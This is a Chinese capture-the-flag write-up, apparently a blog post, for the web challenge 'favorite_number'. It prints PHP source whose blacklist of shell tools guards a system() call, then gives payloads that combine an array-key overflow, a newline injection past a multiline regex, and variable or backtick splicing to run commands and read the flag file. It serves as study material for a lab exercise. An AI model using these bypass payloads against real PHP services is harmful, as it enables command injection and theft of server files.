攻防世界 favorite_number

favorite_number

 <?php
//php5.5.9
$stuff = $_POST["stuff"];
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') {
    $num= $_POST["num"];
    if (preg_match("/^\d+$/im",$num)){
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){
            echo "my favorite num is:";
            system("echo ".$num);
        }else{
            echo 'Bonjour!';
        }
    }
} else {
    highlight_file(__FILE__);
}
  • 是一道php代码审计 进去就给了源码 还特别标注了php5.5.9版本
  • 看了一下题目 首先是要求stuff和array数组是强等于 并且stuff[0] != ‘admin’
  • 接着就是一个正则的 要求num的值必须都是数字
  • 最后就是一个黑名单过滤
  • 成功的话 就会调用system();
  • 前面提到了php5.5.9版本 该版本有给bug
    在这里插入图片描述
  • 是个数组键值的溢出 将0x100000000转成10进制得到4294967296 构造payload
    stuff[4294967296]=admin&stuff[1]=user&num=20201212
  • 这里也可以用0x200000000等
  • 接着就是正则必须是数字了 该正则用了跨行检测的修饰符 %0a绕过
  • stuff[4294967296]=admin&stuff[1]=user&num=20201212%0als
  • Hackbar和Max hackbar 同时罢工
  • burpsuit抓包
    在这里插入图片描述-变量拼接读取flag
    -stuff[4294967296]=admin&stuff[1]=user&num=20201212%0aa=f;b=lag;tac /$a$b
  • 或者用``绕过
stuff[4294967296]=admin&stuff[1]=user&num=20201212%0aca``t  /fal``g
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值